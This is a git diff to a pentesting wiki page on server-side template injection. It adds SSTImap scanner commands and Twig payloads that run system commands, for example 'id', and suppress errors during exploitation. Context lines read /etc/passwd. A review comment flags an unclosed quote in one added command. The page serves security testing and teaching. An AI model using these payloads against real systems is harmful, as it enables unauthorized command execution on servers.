diff --git a/pentesting-web/ssti-server-side-template-injection/README.md b/pentesting-web/ssti-server-side-template-injection/README.md
index dc87abfe4..ed9cf950b 100644
--- a/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/pentesting-web/ssti-server-side-template-injection/README.md
@@ -125,6 +125,14 @@ tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..."
 tinja url -u "http://example.com/" -d "username=Kirlia" -c "PHPSESSID=ABC123..."
 ```
 
+### [SSTImap](https://github.com/vladko312/sstimap)
+
+```bash
+python3 sstimap.py -i -l 5
+python3 sstimap.py -u "http://example.com/ --crawl 5 --forms
+python3 sstimap.py -u 'https://example.com/page?name=John' -s
+```
+
 ### [Tplmap](https://github.com/epinna/tplmap)
 
 ```python
@@ -539,6 +547,10 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1
 {{['id']|filter('system')}}
 {{['cat\x20/etc/passwd']|filter('system')}}
 {{['cat$IFS/etc/passwd']|filter('system')}}
+{{['id',""]|sort('system')}}
+
+#Hide warnings and errors for automatic exploitation
+{{["error_reporting", "0"]|sort("ini_set")}}
 ```
 
 **Twig - Template format**
@@ -1040,6 +1052,8 @@ If you think it could be useful, read:
 
 {% embed url="https://github.com/Hackmanit/TInjA" %}
 
+{% embed url="https://github.com/vladko312/sstimap" %}
+
 {% embed url="https://github.com/epinna/tplmap" %}
 
 {% embed url="https://github.com/Hackmanit/template-injection-table" %}
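Review bot: The second SSTImap example added in the first hunk opens a double quote before the URL and never closes it (`-u "http://example.com/ --crawl 5 --forms`). Pasted into a shell, the line is left waiting for the closing quote, and `--crawl 5 --forms` would be read as part of the URL argument rather than as options. Close the quote right after the URL: `python3 sstimap.py -u "http://example.com/" --crawl 5 --forms`. The other two added examples quote their arguments correctly.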